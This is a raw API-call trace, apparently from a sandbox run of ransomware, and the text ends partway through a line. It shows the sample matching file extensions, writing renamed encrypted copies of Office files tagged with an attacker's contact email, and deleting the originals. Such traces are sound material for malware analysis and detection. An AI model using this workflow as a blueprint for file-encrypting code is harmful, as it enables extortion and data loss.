[0274.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60 [0274.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60 [0274.016] lstrlenW (lpString=".doc") returned 4 [0274.016] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.016] lstrlenW (lpString=".docx") returned 5 [0274.016] lstrcmpiW (lpString1=".docx", lpString2="2.DLL") returned -1 [0274.016] lstrlenW (lpString=".pdf") returned 4 [0274.016] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.016] lstrlenW (lpString=".xls") returned 4 [0274.016] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.016] lstrlenW (lpString=".xlsx") returned 5 [0274.016] lstrcmpiW (lpString1=".xlsx", lpString2="2.DLL") returned -1 [0274.016] lstrlenW (lpString=".ppt") returned 4 [0274.016] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.016] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60 [0274.016] lstrlenW (lpString=".zip") returned 4 [0274.016] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.017] lstrlenW (lpString=".rar") returned 4 [0274.017] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.017] lstrlenW (lpString=".bz2") returned 4 [0274.017] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.017] lstrlenW (lpString=".7z") returned 3 [0274.017] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60 [0274.017] lstrlenW (lpString=".dbf") returned 4 [0274.017] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60 [0274.017] lstrlenW (lpString=".1cd") returned 4 [0274.017] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.017] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRINTL32.DLL") returned 60 [0274.017] lstrlenW (lpString=".jpg") returned 4 [0274.017] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.017] lstrcmpiW (lpString1=".HXT", lpString2=".USA") returned -1 [0274.017] lstrlenW (lpString="GROOVE_COL.HXT") returned 14 [0274.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.017] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=218) returned 1 [0274.018] CloseHandle (hObject=0x3c0) returned 1 [0274.018] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt")) returned 0x20 [0274.018] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.018] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.018] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.019] GetLastError () returned 0x0 [0274.019] ReadFile (in: hFile=0x3c0, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0xda, lpOverlapped=0x0) returned 1 [0274.022] WriteFile (in: hFile=0x2ac, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0274.022] ReadFile (in: hFile=0x3c0, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.022] WriteFile (in: hFile=0x2ac, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0274.022] SetEndOfFile (hFile=0x2ac) returned 1 [0274.024] CloseHandle (hObject=0x2ac) returned 1 [0274.024] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.024] SetEndOfFile (hFile=0x3c0) returned 1 [0274.026] CloseHandle (hObject=0x3c0) returned 1 [0274.026] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.027] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_col.hxt")) returned 1 [0274.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0274.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0274.027] lstrlenW (lpString=".doc") returned 4 [0274.027] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0274.027] lstrlenW (lpString=".docx") returned 5 [0274.027] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0274.027] lstrlenW (lpString=".pdf") returned 4 [0274.027] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0274.027] lstrlenW (lpString=".xls") returned 4 [0274.027] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0274.027] lstrlenW (lpString=".xlsx") returned 5 [0274.027] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0274.027] lstrlenW (lpString=".ppt") returned 4 [0274.027] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0274.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0274.027] lstrlenW (lpString=".zip") returned 4 [0274.027] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0274.027] lstrlenW (lpString=".rar") returned 4 [0274.027] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0274.027] lstrlenW (lpString=".bz2") returned 4 [0274.027] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0274.028] lstrlenW (lpString=".7z") returned 3 [0274.028] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0274.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0274.028] lstrlenW (lpString=".dbf") returned 4 [0274.028] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0274.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0274.028] lstrlenW (lpString=".1cd") returned 4 [0274.028] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0274.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0274.028] lstrlenW (lpString=".jpg") returned 4 [0274.028] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0274.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0274.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0274.028] lstrlenW (lpString=".doc") returned 4 [0274.028] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0274.028] lstrlenW (lpString=".docx") returned 5 [0274.028] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0274.028] lstrlenW (lpString=".pdf") returned 4 [0274.028] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0274.028] lstrlenW (lpString=".xls") returned 4 [0274.028] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0274.028] lstrlenW (lpString=".xlsx") returned 5 [0274.028] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0274.028] lstrlenW (lpString=".ppt") returned 4 [0274.028] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0274.028] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0274.028] lstrlenW (lpString=".zip") returned 4 [0274.028] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0274.028] lstrlenW (lpString=".rar") returned 4 [0274.028] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0274.028] lstrlenW (lpString=".bz2") returned 4 [0274.029] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0274.029] lstrlenW (lpString=".7z") returned 3 [0274.029] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0274.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0274.029] lstrlenW (lpString=".dbf") returned 4 [0274.029] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0274.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0274.029] lstrlenW (lpString=".1cd") returned 4 [0274.029] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0274.029] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_COL.HXT") returned 62 [0274.029] lstrlenW (lpString=".jpg") returned 4 [0274.029] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0274.029] lstrcmpiW (lpString1=".HXK", lpString2=".USA") returned -1 [0274.029] lstrlenW (lpString="GROOVE_F_COL.HXK") returned 16 [0274.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.029] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=111) returned 1 [0274.029] CloseHandle (hObject=0x3c0) returned 1 [0274.029] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk")) returned 0x20 [0274.030] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.030] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.030] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.030] GetLastError () returned 0x0 [0274.030] ReadFile (in: hFile=0x3c0, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x6f, lpOverlapped=0x0) returned 1 [0274.031] WriteFile (in: hFile=0x2ac, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x70, lpOverlapped=0x0) returned 1 [0274.032] ReadFile (in: hFile=0x3c0, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.032] WriteFile (in: hFile=0x2ac, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0274.032] SetEndOfFile (hFile=0x2ac) returned 1 [0274.032] CloseHandle (hObject=0x2ac) returned 1 [0274.032] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.032] SetEndOfFile (hFile=0x3c0) returned 1 [0274.034] CloseHandle (hObject=0x3c0) returned 1 [0274.034] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.034] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_f_col.hxk")) returned 1 [0274.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0274.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0274.034] lstrlenW (lpString=".doc") returned 4 [0274.034] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0274.034] lstrlenW (lpString=".docx") returned 5 [0274.034] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0274.034] lstrlenW (lpString=".pdf") returned 4 [0274.034] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0274.035] lstrlenW (lpString=".xls") returned 4 [0274.035] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0274.035] lstrlenW (lpString=".xlsx") returned 5 [0274.035] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0274.035] lstrlenW (lpString=".ppt") returned 4 [0274.035] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0274.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0274.035] lstrlenW (lpString=".zip") returned 4 [0274.035] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0274.035] lstrlenW (lpString=".rar") returned 4 [0274.035] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0274.035] lstrlenW (lpString=".bz2") returned 4 [0274.035] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0274.035] lstrlenW (lpString=".7z") returned 3 [0274.035] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0274.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0274.035] lstrlenW (lpString=".dbf") returned 4 [0274.035] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0274.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0274.035] lstrlenW (lpString=".1cd") returned 4 [0274.035] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0274.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0274.035] lstrlenW (lpString=".jpg") returned 4 [0274.035] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0274.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0274.035] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0274.035] lstrlenW (lpString=".doc") returned 4 [0274.035] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0274.035] lstrlenW (lpString=".docx") returned 5 [0274.035] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0274.035] lstrlenW (lpString=".pdf") returned 4 [0274.036] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0274.036] lstrlenW (lpString=".xls") returned 4 [0274.036] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0274.036] lstrlenW (lpString=".xlsx") returned 5 [0274.036] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0274.036] lstrlenW (lpString=".ppt") returned 4 [0274.036] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0274.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0274.036] lstrlenW (lpString=".zip") returned 4 [0274.036] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0274.036] lstrlenW (lpString=".rar") returned 4 [0274.036] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0274.036] lstrlenW (lpString=".bz2") returned 4 [0274.036] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0274.036] lstrlenW (lpString=".7z") returned 3 [0274.036] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0274.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0274.036] lstrlenW (lpString=".dbf") returned 4 [0274.036] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0274.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0274.036] lstrlenW (lpString=".1cd") returned 4 [0274.036] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0274.036] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_F_COL.HXK") returned 64 [0274.036] lstrlenW (lpString=".jpg") returned 4 [0274.036] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0274.036] lstrcmpiW (lpString1=".HXK", lpString2=".USA") returned -1 [0274.036] lstrlenW (lpString="GROOVE_K_COL.HXK") returned 16 [0274.037] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.037] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=110) returned 1 [0274.037] CloseHandle (hObject=0x3c0) returned 1 [0274.037] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk")) returned 0x20 [0274.037] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.037] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.037] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.037] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.037] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ac [0274.038] GetLastError () returned 0x0 [0274.038] ReadFile (in: hFile=0x3c0, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x6e, lpOverlapped=0x0) returned 1 [0274.038] WriteFile (in: hFile=0x2ac, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x70, lpOverlapped=0x0) returned 1 [0274.039] ReadFile (in: hFile=0x3c0, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.039] WriteFile (in: hFile=0x2ac, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xf4, lpOverlapped=0x0) returned 1 [0274.039] SetEndOfFile (hFile=0x2ac) returned 1 [0274.039] CloseHandle (hObject=0x2ac) returned 1 [0274.039] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.039] SetEndOfFile (hFile=0x3c0) returned 1 [0274.041] CloseHandle (hObject=0x3c0) returned 1 [0274.041] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0274.041] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\groove_k_col.hxk")) returned 1 [0274.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0274.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0274.042] lstrlenW (lpString=".doc") returned 4 [0274.042] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0274.042] lstrlenW (lpString=".docx") returned 5 [0274.042] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0274.042] lstrlenW (lpString=".pdf") returned 4 [0274.042] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0274.042] lstrlenW (lpString=".xls") returned 4 [0274.042] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0274.042] lstrlenW (lpString=".xlsx") returned 5 [0274.042] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0274.042] lstrlenW (lpString=".ppt") returned 4 [0274.042] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1 [0274.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0274.042] lstrlenW (lpString=".zip") returned 4 [0274.042] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1 [0274.042] lstrlenW (lpString=".rar") returned 4 [0274.042] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1 [0274.042] lstrlenW (lpString=".bz2") returned 4 [0274.042] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1 [0274.042] lstrlenW (lpString=".7z") returned 3 [0274.042] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1 [0274.042] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0274.043] lstrlenW (lpString=".dbf") returned 4 [0274.043] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1 [0274.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0274.043] lstrlenW (lpString=".1cd") returned 4 [0274.043] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1 [0274.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0274.043] lstrlenW (lpString=".jpg") returned 4 [0274.043] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1 [0274.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0274.043] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GROOVE_K_COL.HXK") returned 64 [0274.043] lstrlenW (lpString=".doc") returned 4 [0274.043] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1 [0274.043] lstrlenW (lpString=".docx") returned 5 [0274.043] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1 [0274.043] lstrlenW (lpString=".pdf") returned 4 [0274.043] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1 [0274.043] lstrlenW (lpString=".xls") returned 4 [0274.043] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1 [0274.043] lstrlenW (lpString=".xlsx") returned 5 [0274.043] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1 [0274.043] lstrlenW 